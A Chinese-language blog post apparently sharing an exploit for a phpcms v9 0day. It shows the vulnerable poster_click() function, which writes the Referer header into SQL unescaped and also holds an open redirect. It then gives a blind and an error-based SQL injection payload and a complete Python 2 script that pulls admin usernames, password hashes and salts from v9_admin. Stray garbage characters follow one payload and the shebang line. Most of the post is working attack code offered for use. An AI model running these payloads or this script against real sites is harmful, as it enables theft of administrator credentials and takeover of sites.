有人放出了 phpcms v9 的 0day,于是随手写了个利用代码。注入代码有两种形式(盲注与报错注入,见下文):
问题函数位于 \phpcms\modules\poster\index.php 的 poster_click() 方法:它把请求的 Referer 头(HTTP_REFERER 常量)未经转义直接写入点击记录表,造成 SQL 注入;此外在多链接分支里还把 $_GET['url'] 未经校验直接用于 Location 跳转(开放重定向)。
public function poster_click() {
    // Click-tracking redirect for a poster (ad) entry identified by ?id=.
    // Records one click row (site, poster id, visitor username/area/ip,
    // referer, time), increments the poster's click counter, then redirects
    // the browser to the configured link URL.
    //
    // SECURITY (review): two attacker-controlled values reach sensitive sinks.
    //   1. HTTP_REFERER is written into the click row below. The payloads
    //      in this post place SQL in the request's Referer header, so this
    //      constant evidently mirrors that header and s_db->insert() does not
    //      escape it -> SQL injection (blind or error-based).
    //   2. $_GET['url'] is passed verbatim to header('Location: ...') in the
    //      multi-link branch -> open redirect.
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;   // cast to int: not injectable
    $r = $this->db->get_one(array('id'=>$id));
    if (!is_array($r) && empty($r)) return false;          // no such poster
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();                                             // how ip() derives the address is not shown here
    $area = $ip_area->get($ip);
    // Username comes from a cookie and lands in the same row; whether
    // param::get_cookie() validates/escapes it is not visible from this file.
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();   // cast to int
        // Vulnerable sink: 'referer' (HTTP_REFERER) is inserted as-is. Fix:
        // escape/parameterize every string field here before it reaches SQL.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));   // '+=1' presumably the framework's increment syntax
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        // Single configured link: redirect target is taken from stored settings.
        $url = $setting['1']['linkurl'];
    } else {
        // Open redirect: ?url= is trusted verbatim. Fix: only accept a value
        // that matches one of the configured linkurl entries.
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    header('Location: '.$url);
}
利用方式(注入点都在 HTTP 请求的 Referer 头中):
1、可以采用布尔盲注的手法(把 payload 放在 Referer 头里发送):
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
根据返回页面是否正常(插入是否出错),逐字符猜解 v9_admin 表中的密码字段。
2、下面这个 payload 是花开写的,随手附上:
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#1 g0 D( i% {7 L( E$ u. ~
此方法是报错注入(error-based)手法:利用 MySQL 中 floor(rand(0)*2) 配合 count(*) 与 group by 触发主键重复的 "Duplicate entry" 报错,把 v9_admin 的 username/password/encrypt 拼接进错误信息中回显。前提是目标页面会把数据库错误输出到响应里,否则需要改用上面的盲注方式。
利用程序(Python 2,使用 httplib;依赖目标回显 MySQL 报错):
#!/usr/bin/env python; Q" r* q) S6 o6 O0 o/ u% y
import httplib,sys,re
def attack():
    """Send the error-based SQL injection to a phpcms v9 poster_click endpoint.

    Reads the target from the command line: ``sys.argv[1]`` is the host (it is
    handed to ``httplib.HTTPConnection``, so ``host`` or ``host:port``) and
    ``sys.argv[2]`` is the site path prefix (``"/"`` or ``"/phpcmsv9/"``).

    The payload rides in the ``Referer`` header; the vulnerable
    ``poster_click()`` action stores that header in a click-log row without
    escaping it.  It is the ``floor(rand(0)*2)`` / ``group by`` trick, which
    makes MySQL raise a ``Duplicate entry '<data>'`` error whose key contains
    ``username_password_encrypt`` from ``v9_admin`` -- so it only works when
    the target prints database errors into the response.  The matched error
    fragment is printed; nothing is returned.

    Python 2 only (``httplib``, ``print`` statements).
    NOTE(review): if the regex matches nothing (errors not displayed, host
    patched) ``datas[0]`` raises IndexError and the connection is left open;
    there is also no socket timeout, so a silent target hangs the script.
    """
    print "Code by Pax.Mac Team conqu3r!"
    print "Welcome to our zone!!!"
    url = sys.argv[1]        # host[:port], no scheme
    paths = sys.argv[2]      # path prefix; "/index.php..." is appended, so a trailing "/" yields "//" (usually harmless)
    conn = httplib.HTTPConnection(url)   # plain HTTP only
    i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
                 "Accept": "text/plain",
                 # Injection vector: the Referer value is what poster_click() inserts unescaped.
                 "Referer": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#"}
    # id=2 must be an existing poster id, otherwise poster_click() returns before the insert.
    conn.request("GET", paths+"/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2", headers = i_headers)
    r1 = conn.getresponse()
    datas = r1.read()
    # Pull the duplicate-key value out of the echoed MySQL error.
    datas = re.findall(r"Duplicate entry \'\w+'", datas)
    print datas[0]   # IndexError when no error was echoed (see docstring)
    conn.close()
if __name__ == "__main__":
    # Entry point: require <host> <path-prefix>, otherwise print usage and exit 1.
    if len(sys.argv) < 3:
        print "Code by Pax.Mac Team conqu3r"
        print "Usgae:"                                      # sic (runtime string kept as-is)
        print " phpcmsattack.py www.paxmac.org /"
        print " phpcmsataack.py www.paxmac.org /phpcmsv9/"   # sic: script name misspelled in the original
        sys.exit(1)
    attack()